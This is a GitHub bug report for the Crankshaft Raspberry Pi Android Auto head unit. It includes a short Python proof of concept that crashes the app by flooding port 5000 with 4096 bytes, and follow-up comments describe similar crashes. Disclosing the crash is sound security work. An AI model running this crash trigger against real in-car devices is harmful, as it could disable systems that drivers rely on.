opencardev/crankshaft #614: Crankshaft will crash if you send an invalid data.

dhje0ng, 2023-01-10:
If you need support: Please post on https://www.reddit.com/r/crankshaft/ as this is a bug tracker, not a support forum.

Note: Reporting issues not based on official published builds will be closed without any comment.

- What phone do you have?
Raspberry PI 4 Model B

- What OS version?
Raspberry PI 4 Model B

- What crankshaft version?
https://github.com/opencardev/crankshaft/releases/tag/v.2022.09.12.1

- Steps to reproduce the bug, if you're planning to report a bug. Please indicate whether the bug is always reproducible.
1. Write and boot Crankshaft image on Raspberry PI4. Images use the latest version released on Github.
2. To run Android Auto, connect your smartphone and Raspberry PI4 with a USB cable and run Android Auto!
3. Executes POC code when Android Auto is running.
4. Run the attached POC code. It is always reproducible. (However, the POC code has the network address of the tester, so you need to modify the IP address in the 6th line of the code!)

- Proof Of Concept Code

```py
#!/usr/bin/python3

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.1.118', 5000))
s.send(b'A'*4096)
r = s.recv(1024)
print(r)
print('exploit!!')
s.close()
```

[image]

My guess is that this is what autoapp is crashing, but I haven't analyzed detailed logs.
Instead, I'm attaching the debug logs I dumped in developer mode.

Thank you.
[debug.zip](https://github.com/opencardev/crankshaft/files/10379924/debug.zip)

balac207134, 2023-02-18:
I have a similar problem.

balac207134, 2023-02-18:
Trying to Start openauto in EGL Mode and then it crashes. Running debuglog, it says couldn’t open /dev/i2c-1. This happens even after i2c is enabled

bluezczatu, 2024-06-13:
> L

same problem :(